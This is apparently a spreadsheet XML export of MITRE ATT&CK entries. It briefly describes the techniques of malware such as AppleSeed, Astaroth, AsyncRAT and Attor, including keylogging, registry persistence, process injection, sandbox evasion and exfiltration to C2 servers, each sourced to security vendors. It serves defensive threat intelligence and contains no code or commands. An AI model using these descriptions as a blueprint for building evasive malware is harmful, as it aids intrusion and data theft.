  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can delete files from a compromised host after they are exfiltrated.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--cf36b530-36fa-40f5-b11c-94b5f5cfaf76</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--b2c4bc70-088c-4e99-863b-65c4267c7220</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use JavaScript to execute PowerShell.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--06a82ed9-c3c3-412a-98f7-838442f4e1cc</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can use &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;GetKeyboardState&lt;/code&gt; to capture keystrokes on the victim’s machine.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--5903c147-70f5-45fe-a63c-418c61566422</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can stage files in a central location prior to exfiltration.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--d747c1d7-646a-4d72-a00b-e2f10ed1f9eb</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can achieve execution through users running malicious file attachments distributed via email.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--d2cf553c-b2a3-4599-9cb8-4722eb1b1293</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can disguise JavaScript files as PDFs.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--2f249959-a448-454d-85ab-f71c8c5ff277</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--71b2b21e-bb44-47eb-85da-7a593419c0c5</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use multiple dynamically resolved API calls.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--90ae4d92-9278-4cdd-a71c-b217a8bbb86a</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to Base64 encode its payload and custom encrypt API calls.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--b49fe95b-bd40-4dc7-a42c-b5741cde4941</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to execute its payload via PowerShell.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--1628f41f-4941-40d7-a11c-1f345925ab6e</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can enumerate the current process on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--49944838-b6f8-4e1c-94d4-5b70cb436700</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to create the Registry key name &lt;code&gt;EstsoftAutoUpdate&lt;/code&gt; at &lt;code&gt;HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce&lt;/code&gt; to establish persistence.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--e1cf08cf-e483-44a1-bdfe-cdfa424d69e5</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can call regsvr32.exe for execution.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--ee56e02a-67c0-4c26-b643-7569de421298</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can take screenshots on a compromised host by calling a series of APIs.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--d0eaa321-d917-4dee-aca4-6644ed2df1df</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has used UPX packers for its payload DLL.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--2a04cfdd-a27a-498c-bbe2-8677a13811e0</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has been distributed to victims through malicious e-mail attachments.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--3577cdd8-c9fd-4b97-94a5-6332f9cad77a</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can identify the OS version of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--7920e962-00d7-4eb0-a94d-ed1ca196cd50</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can identify the IP of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--2eae8ade-1ddb-41d4-82cc-572b1158c06c</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can pull a timestamp from the victim's machine.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--ec134ae1-153b-46bb-b5f8-d1b9ac5275df</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to communicate with C2 over HTTP.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--c223714e-1321-45e2-b5e2-2b54959d340a</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--5ab058a1-4c88-481f-a7a8-77855ee916e6</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--fa77baa1-a258-4059-aa84-6822fe023d70</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using &lt;code&gt;runas&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--48e9217d-e93d-440f-9fa1-93116e5792bd</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--2995ea85-ccdb-4378-bc35-3c62ccf5fa9d</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--26303f07-87f0-4740-b6ea-e81e8c01b267</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--17bfea1d-e3c8-4bf9-8102-576e7c87883e</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--ed113911-e21a-4b1b-a082-42313d5aa887</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--61bf5c24-e7ae-4178-916d-d236e928b897</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--cbc2cb80-8f07-46dd-b167-3f237e39f39d</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--cbb686ae-3dc8-4e91-80fc-075209505425</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--1681f4aa-4bb1-482a-8fdf-8c1b724635d9</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--0997f41a-0232-4331-8a11-11a6433d8343</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--914406e6-9388-477d-ba6b-97e5ebec31f0</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).</t>
  </si>
  <si>
    <t>relationship--0ed0ef18-126f-4a03-ac2a-f315dfb48b7d</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--c7f1b492-eea7-45d1-ab78-6794c7560c67</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--76701e52-cfce-4294-91e4-485fad7c8f0f</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--535b87bb-31fd-4e14-8279-c64c301e912d</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--5fdd0fba-8d1d-411a-b47b-3e5aae512892</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--3a24f6ef-80e2-48b9-8f00-36ca4f59f191</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--ff87edd7-34b1-47f2-9131-dd6a47854805</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--549c2737-1097-4a16-8d4b-01ad0e3e689f</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--a5848e5c-0a64-44f2-9432-4d503baea628</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--49badb38-7e44-4dd6-85b2-91bb281385a0</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display a host's ARP cache, which may include address resolutions for remote systems.(Citation: TechNet Arp)(Citation: Palo Alto ARP)</t>
  </si>
  <si>
    <t>relationship--be4040ce-c8cf-408d-b126-0954bbc1545b</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display ARP configuration information on the host.(Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>relationship--d4fd461f-fc58-4060-aed4-cebe64f249b9</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>malware--edb24a93-1f7a-4bbf-a738-1397a14662c6</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--29bf3ce1-f531-472f-9825-b990aab2f09c</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has obfuscated and randomized parts of the JScript code it is initiating.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--c97d4d74-994a-48eb-8175-5e897c98b99a</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses ActiveX objects for file execution and manipulation. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e94d140f-9345-48bc-9fb9-f48a117e0739</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--abe93e80-2fc7-4c71-846e-b476529b4ae6</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can launch itself via DLL Search Order Hijacking.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--70b2e51a-c5c4-48af-8f9c-112a4854e18d</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. (Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--383301a1-1cf9-4a74-ab22-2ed1a8c2a42b</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used a DGA in C2 communications.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--ec60f1d2-2bb3-459d-8095-5bda47927226</t>
  </si>
  <si>
    <t>08 December 2020</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) exfiltrates collected information from its r1.log file to the external C2 server. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--76b77ff0-54db-40bd-910b-2776c714075d</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) loads its module with the XSL script parameter &lt;code&gt;vShow&lt;/code&gt; set to zero, which opens the application with a hidden window. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--05491bb5-e209-4480-a1a8-9b385efe14ad</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</si>
  <si>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</si>
  <si>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relationship--ad731b3e-709e-49d0-a501-6fe69f78a428</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses JavaScript to perform its core functionalities. (Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--71ec5140-320c-452c-8512-6a787af027c8</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) logs keystrokes from the victim's machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6de0bf91-2034-4821-b231-795aa75db97f</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects data in a plaintext file named r1.log before exfiltration. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--f26e1997-733e-4c3c-ac26-294048466c52</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious files including VBS, LNK, and HTML for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--3683548e-0331-4407-98b0-82253efc0b09</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can abuse alternate data streams (ADS) to store content for malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--cb11ee03-ac58-417a-a50b-4c3229e226a5</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used an XOR-based algorithm to encrypt payloads twice with different keys.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--23b77b77-e100-4ac2-93b9-b900a04844cd</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) searches for different processes on the system.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--366bf114-ddd3-473a-9468-c82811c6ed70</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</si>
  <si>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</si>
  <si>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relationship--87a90347-6f15-461c-a44c-9acf503a606b</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) creates a startup item for persistence. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--e772ce2d-bc2b-4e7f-af67-700737c75d2c</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can be loaded through regsvr32.exe.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--49eb0604-2dee-4dcd-8029-cdd478033749</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) checks for the presence of Avast antivirus in the &lt;code&gt;C:\Program\Files\&lt;/code&gt; folder. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--4f90f58d-de6a-41b8-8ffd-1db5da42db34</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses the LoadLibraryExW() function to load additional modules. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--30c9343b-bb15-494a-a1cf-4449131ec216</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373)'s initial payload is a malicious .LNK file. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--8d34f263-bd94-44a4-b8ec-b6cae06dcdd2</t>
  </si>
  <si>
    <t>14 December 2019</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a software packer called Pe123\RPolyCryptor.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--3e36bc27-d1c1-4ccd-bf6d-2868843664c8</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--6d1cd674-0466-4209-b9b5-7ce45ed359d1</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) encodes data using Base64 before sending it to the C2 server. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--3a1883a0-8626-4cf0-8e0f-19bf9cf39a30</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--2cfab77c-89d8-4e95-9ef9-43e0a77c5e4d</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the machine name and keyboard language from the system. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--29d3798c-dc27-4950-abc4-30b48608a746</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the external IP address from the system. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--86b41c35-ae4d-418b-9409-07e49d3c769d</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the timestamp from the infected machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--04d60222-e8da-4de5-bc58-dcfae65986f5</t>
  </si>
  <si>
    <t>relationship--be30816a-854a-4568-ade5-8baa60fa087c</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious VBS e-mail attachments for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>relationship--34ad093b-408b-4694-8aba-862f8de10102</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) spawns a CMD process to execute commands. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--f1286eda-5b9a-4fd9-a506-bcc3b2870550</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses WMIC to execute payloads. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>relationship--a04db303-7ae6-4ecd-a397-f3e964bd6e3c</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>relationship--7dc3f129-9cac-4279-a4d2-b5dbe1237f07</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--0324f691-2708-4272-86a5-e0cb40aeba9e</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can be configured to use dynamic DNS.(Citation: AsyncRAT GitHub)</t>
  </si>
  <si>
    <t>relationship--6a56f549-3835-4f1f-8ece-fb8400f04432</t>
  </si>
  <si>
    <t xml:space="preserve">
[AsyncRAT](https://attack.mitre.org/software/S1087) can hide the execution of scheduled tasks using `ProcessWindowStyle.Hidden`.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--783f71a1-8a2b-4dbe-9011-a24042f36c88</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to download files over SFTP.(Citation: AsyncRAT GitHub)</t>
  </si>
  <si>
    <t>relationship--ca31e6ec-8cf9-4e5e-907a-895c3d19543f</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can capture keystrokes on the victim’s machine.(Citation: AsyncRAT GitHub)</t>
  </si>
  <si>
    <t>relationship--f8999244-37ea-40f1-aa90-444a676dd592</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to use OS APIs including `CheckRemoteDebuggerPresent`.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--10435dca-baee-420a-a2b3-b13209e2d96a</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can examine running processes to determine if a debugger is present.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--d531b421-7347-4dd6-9a98-0b05e6421b40</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can create a scheduled task to maintain persistence on system start-up.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--f9c7cede-2f07-4a54-9dcd-14304055886a</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) has the ability to view the screen on compromised hosts.(Citation: AsyncRAT GitHub)</t>
  </si>
  <si>
    <t>relationship--ed592480-2e4d-4604-aa8d-89bf58d72f6b</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can identify strings such as Virtual, vmware, or VirtualBox to detect virtualized environments.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--7c290539-09a9-4ff2-956a-d5026dba86a5</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can check the disk size through the values obtained with `DeviceInfo.`(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--43ab17df-742f-4bc5-815a-7da2feed73f0</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can check if the current user of a compromised system is an administrator. (Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--57851829-665d-4871-9327-1734547f7d9d</t>
  </si>
  <si>
    <t>[AsyncRAT](https://attack.mitre.org/software/S1087) can record screen content on targeted systems.(Citation: AsyncRAT GitHub)</t>
  </si>
  <si>
    <t>relationship--84094d38-2a22-4d9a-b570-72e45baf17ab</t>
  </si>
  <si>
    <t>S0438</t>
  </si>
  <si>
    <t>Attor</t>
  </si>
  <si>
    <t>malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--0dfdfffc-2d1b-487f-91e0-66d81b185367</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--07ab0a67-7c7b-4971-9a3e-45069f234800</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--44de534a-f105-4016-b7a4-2e7fce8a203e</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--f5e7233b-6419-4c09-b95b-c43f3004f246</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--eb5510f9-e2ec-4a57-9a96-93dc3028bcea</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--982474f3-d61d-49ac-b5be-30553e872db1</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--f49a45b8-6efb-4ac5-8714-9dfd9b31edbd</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--40205b23-d3d0-4d6a-a739-7ba2eb061c4f</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--7f7bf7a4-4f3a-48a6-bc19-4a139ba165a0</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)’s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--d42cdf33-c3c1-4546-9a4f-40f6f64cd524</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--93f46e6e-cabc-4274-b50e-63bda692d01e</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--01a01a28-19e5-4e32-8a24-a98f2b69ced5</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--c47d3636-65dd-4da1-8c90-e3e7aeb7effb</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--57a19f3b-838f-45df-8cfe-964cbe5396d2</t>
  </si>
  <si>
    <t>One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>relationship--a9ebd162-da0a-4582-ba63-6bb54e165730</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
